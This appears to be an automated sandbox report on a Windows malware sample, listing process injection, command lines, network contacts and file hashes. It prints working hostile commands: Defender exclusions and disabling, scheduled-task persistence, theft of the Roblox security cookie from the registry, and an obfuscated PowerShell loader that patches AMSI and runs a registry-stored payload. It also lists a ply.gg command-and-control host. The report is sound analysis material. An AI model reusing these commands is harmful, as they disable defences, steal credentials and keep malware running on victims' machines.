PID 2956 wrote to memory of 376 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2956 wrote to memory of 376 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2956 wrote to memory of 376 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2956 wrote to memory of 376 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2956 wrote to memory of 376 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2956 wrote to memory of 376 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2956 wrote to memory of 376 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 376 wrote to memory of 612 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\winlogon.exe
PID 376 wrote to memory of 672 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsass.exe
PID 376 wrote to memory of 968 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 376 wrote to memory of 384 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\dwm.exe
PID 3312 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3312 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 672 wrote to memory of 2848 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 672 wrote to memory of 2848 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 376 wrote to memory of 700 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 376 wrote to memory of 1036 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 376 wrote to memory of 1112 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 376 wrote to memory of 1140 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 376 wrote to memory of 1184 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 376 wrote to memory of 1208 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 376 wrote to memory of 1252 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 376 wrote to memory of 1296 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 376 wrote to memory of 1364 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3184 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\Wbem\wmic.exe
PID 3184 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\Wbem\wmic.exe
PID 376 wrote to memory of 1408 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 672 wrote to memory of 2848 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 376 wrote to memory of 1496 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 672 wrote to memory of 2848 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 376 wrote to memory of 1588 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 376 wrote to memory of 1596 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 376 wrote to memory of 1688 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 376 wrote to memory of 1712 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 376 wrote to memory of 1764 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 376 wrote to memory of 1788 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 376 wrote to memory of 1872 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 376 wrote to memory of 2032 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 376 wrote to memory of 2044 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 376 wrote to memory of 1532 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 376 wrote to memory of 1940 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 376 wrote to memory of 2068 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 672 wrote to memory of 2120 N/A C:\Windows\system32\lsass.exe C:\Windows\system32\wbem\wmiprvse.exe
PID 672 wrote to memory of 2268 N/A C:\Windows\system32\lsass.exe C:\Windows\System32\svchost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Users\Admin\AppData\Local\Temp\rootkit.exe

"C:\Users\Admin\AppData\Local\Temp\rootkit.exe"

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe

"C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe"

C:\Users\Admin\AppData\Local\Temp\Modify.exe

"C:\Users\Admin\AppData\Local\Temp\Modify.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\www.DeadSec0000000000-obfusecator.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Modify.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /F /TN "www.DeadSec0000000000-obfusecator" /SC ONLOGON /TR "C:\ProgramData\www.DeadSec0000000000-obfusecator.exe" /RL HIGHEST

C:\ProgramData\www.DeadSec0000000000-obfusecator.exe

"C:\ProgramData\www.DeadSec0000000000-obfusecator.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:QghMCXDoDAhj{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$zeDJIHDraPQlze,[Parameter(Position=1)][Type]$rJIDyrTyBn)$BRUqJRZiOCH=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+'f'+[Char](108)+'e'+'c'+''+[Char](116)+''+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+'ga'+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+''+[Char](101)+''+'m'+''+[Char](111)+'r'+[Char](121)+'M'+'o'+''+'d'+''+'u'+''+'l'+'e',$False).DefineType(''+'M'+'y'+[Char](68)+'el'+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+''+[Char](84)+'y'+[Char](112)+'e','Cl'+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+','+'S'+'ea'+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+'A'+'n'+''+[Char](115)+'iC'+'l'+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+'A'+'u'+''+[Char](116)+''+[Char](111)+''+'C'+'las'+[Char](115)+'',[MulticastDelegate]);$BRUqJRZiOCH.DefineConstructor(''+[Char](82)+''+'T'+''+'S'+'p'+'e'+''+[Char](99)+''+'i'+''+[Char](97)+''+[Char](108)+'N'+[Char](97)+''+[Char](109)+''+'e'+''+','+''+'H'+''+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$zeDJIHDraPQlze).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+''+[Char](105)+'me,'+[Char](77)+''+'a'+''+[Char](110)+'a'+[Char](103)+'e'+'d'+'');$BRUqJRZiOCH.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','Pu'+[Char](98)+'li'+'c'+','+[Char](72)+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+'yS'+'i'+''+'g'+''+[Char](44)+''+'N'+''+'e'+'wS'+'l'+''+[Char](111)+'t'+','+''+'V'+''+[Char](105)+''+'r'+''+'t'+''+[Char](117)+''+[Char](97)+'l',$rJIDyrTyBn,$zeDJIHDraPQlze).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+','+'M'+[Char](97)+'n'+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');Write-Output $BRUqJRZiOCH.CreateType();}$adLTwGkHvlaqQ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+''+[Char](116)+'em'+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+'ic'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+''+'t'+''+'.'+''+[Char](87)+''+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+'s'+''+[Char](97)+''+[Char](102)+'e'+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+'et'+'h'+''+'o'+''+[Char](100)+''+'s'+'');$XyzQGPuAtvSYnu=$adLTwGkHvlaqQ.GetMethod('Ge'+[Char](116)+'P'+'r'+''+[Char](111)+''+[Char](99)+'A'+'d'+''+'d'+''+[Char](114)+''+'e'+''+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+''+','+''+[Char](83)+'t'+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$NwWSliCcKoXUzoJiZmO=QghMCXDoDAhj @([String])([IntPtr]);$zSDCHWHQrYPLiiiucJWZit=QghMCXDoDAhj @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$BMpopnyzoeD=$adLTwGkHvlaqQ.GetMethod(''+[Char](71)+''+'e'+'t'+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+'n'+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+'k'+''+'e'+'r'+'n'+'el'+'3'+''+'2'+''+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'')));$CTjFknMjGgihLs=$XyzQGPuAtvSYnu.Invoke($Null,@([Object]$BMpopnyzoeD,[Object](''+[Char](76)+'oa'+'d'+''+'L'+''+'i'+''+[Char](98)+''+'r'+''+'a'+''+[Char](114)+''+'y'+''+'A'+'')));$IbqICObzrKvjtnjIH=$XyzQGPuAtvSYnu.Invoke($Null,@([Object]$BMpopnyzoeD,[Object](''+[Char](86)+''+[Char](105)+'rtu'+[Char](97)+'l'+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+'e'+''+[Char](99)+''+[Char](116)+'')));$pBfLdoV=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CTjFknMjGgihLs,$NwWSliCcKoXUzoJiZmO).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+'i.'+'d'+''+[Char](108)+''+[Char](108)+'');$QPjNVbkBkekqhoPQc=$XyzQGPuAtvSYnu.Invoke($Null,@([Object]$pBfLdoV,[Object]('A'+[Char](109)+''+[Char](115)+'iS'+'c'+''+'a'+''+[Char](110)+''+[Char](66)+''+'u'+'f'+[Char](102)+''+'e'+''+'r'+'')));$RmafBvWwWO=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IbqICObzrKvjtnjIH,$zSDCHWHQrYPLiiiucJWZit).Invoke($QPjNVbkBkekqhoPQc,[uint32]8,4,[ref]$RmafBvWwWO);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$QPjNVbkBkekqhoPQc,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IbqICObzrKvjtnjIH,$zSDCHWHQrYPLiiiucJWZit).Invoke($QPjNVbkBkekqhoPQc,[uint32]8,0x20,[ref]$RmafBvWwWO);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+''+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](119)+'w'+[Char](119)+'s'+[Char](116)+'a'+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{4867e75a-3aa2-49f1-869a-9acc3426f9e3}

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'www.DeadSecObbbfuscation.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.200.3:443 gstatic.com tcp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 232.137.159.162.in-addr.arpa udp
N/A 127.0.0.1:49403 tcp
US 8.8.8.8:53 quotes-suites.gl.at.ply udp
N/A 127.0.0.1:49403 tcp
N/A 127.0.0.1:49403 tcp
US 8.8.8.8:53 quotes-suites.gl.at.ply udp
N/A 127.0.0.1:49403 tcp
US 8.8.8.8:53 240.143.123.92.in-addr.arpa udp
US 8.8.8.8:53 quotes-suites.gl.at.ply.gg udp
US 147.185.221.20:49403 quotes-suites.gl.at.ply.gg tcp
US 147.185.221.20:49403 quotes-suites.gl.at.ply.gg tcp
US 147.185.221.20:49403 quotes-suites.gl.at.ply.gg tcp
US 147.185.221.20:49403 quotes-suites.gl.at.ply.gg tcp

Files

memory/1884-0-0x00007FF8CDFD3000-0x00007FF8CDFD5000-memory.dmp

memory/1884-1-0x00000000006D0000-0x000000000071A000-memory.dmp

memory/1884-4-0x00007FF8CDFD0000-0x00007FF8CEA91000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe

MD5 737b2d60dc5d475685b65f5c288e00c0
SHA1 144ba7647d8609abe4aab74d4f191e2c594dd55a
SHA256 69c3458a319518d10939633f7421eb833c8c9c904f989f0ef75a572a59a1f084
SHA512 96a22774e1b5c22d9d4114a8f22f1f75cf2edc5970442e1b1e5eabfc70a922d3f4a5e5d8c93150f50ef3da45b241745f861f1d00b306c11707097495b84ecee6

C:\Users\Admin\AppData\Local\Temp\Modify.exe

MD5 9259d8aef8f52e8ff4fa082c0074c9b0
SHA1 88abb68a5632812be3c18e0c740e3818d9501b3e
SHA256 45d4033eeaa6aa420a644c3eb2d0ef659320c9a13e22d1d16930c807847203db
SHA512 9cb06d4026a53208e80865cdb21d79e40d418518a168680537cafa08f1c295094238014ba35c2b7794a773ac2dc480b01cf5811d5b1e60bf911d7a6d03985ede

memory/3184-28-0x000001FE30DC0000-0x000001FE30E00000-memory.dmp

memory/3312-19-0x00000000000E0000-0x00000000000F0000-memory.dmp

memory/3312-29-0x00007FF8CDFD0000-0x00007FF8CEA91000-memory.dmp

memory/3184-30-0x00007FF8CDFD0000-0x00007FF8CEA91000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iuvpknto.caq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3808-40-0x00000196FB6E0000-0x00000196FB702000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 77d622bb1a5b250869a3238b9bc1402b
SHA1 d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256 f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512 d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

C:\ProgramData\www.DeadSec0000000000-obfusecator.exe

MD5 22d120454dd38d7f1a3f1cd0eb497f95
SHA1 4c11a082bf8e64b21310b959821a9f7324aa8107
SHA256 6fda5bd63e6647c70c7f420b4145898cada9e1a8bff4fca7f6a5859b648d217c
SHA512 1552101b7a22082eb69fe3485c53f595055bfc6db01ed14d4abc6f9cb9793e8ca3bc2f2448741fd8b4616f735c9f4f2e0299dc938d264103107fccbe68dc39a9

memory/1884-73-0x00007FF8CDFD0000-0x00007FF8CEA91000-memory.dmp

memory/3184-76-0x000001FE4B550000-0x000001FE4B5C6000-memory.dmp

memory/3184-77-0x000001FE4B4D0000-0x000001FE4B520000-memory.dmp

memory/3184-78-0x000001FE32A40000-0x000001FE32A5E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 966914e2e771de7a4a57a95b6ecfa8a9
SHA1 7a32282fd51dd032967ed4d9a40cc57e265aeff2
SHA256 98d3c70d7004fa807897317bd6cd3e977b9b6c72d4d2565aca0f9f8b1c315cba
SHA512 dc39c7124a9c7c8d4c7e8e16290c46360b8d9a8f4e43edaacbbeb09bdcf20159a53db54d2b322372001b6a3de52b2f88e9088b5fdbc7638816ae0d122bb015f5

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 548dd08570d121a65e82abb7171cae1c
SHA1 1a1b5084b3a78f3acd0d811cc79dbcac121217ab
SHA256 cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc
SHA512 37b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b

memory/3312-122-0x00007FF8CDFD0000-0x00007FF8CEA91000-memory.dmp

memory/3184-124-0x000001FE32BB0000-0x000001FE32BBA000-memory.dmp

memory/3184-125-0x000001FE4B6D0000-0x000001FE4B6E2000-memory.dmp

memory/2956-128-0x0000020978110000-0x000002097813A000-memory.dmp

memory/2956-129-0x00007FF8EC290000-0x00007FF8EC485000-memory.dmp

memory/2956-130-0x00007FF8EA600000-0x00007FF8EA6BE000-memory.dmp

memory/376-134-0x0000000140000000-0x0000000140008000-memory.dmp

memory/376-133-0x0000000140000000-0x0000000140008000-memory.dmp

memory/376-140-0x00007FF8EA600000-0x00007FF8EA6BE000-memory.dmp

memory/376-139-0x00007FF8EC290000-0x00007FF8EC485000-memory.dmp

memory/376-138-0x0000000140000000-0x0000000140008000-memory.dmp

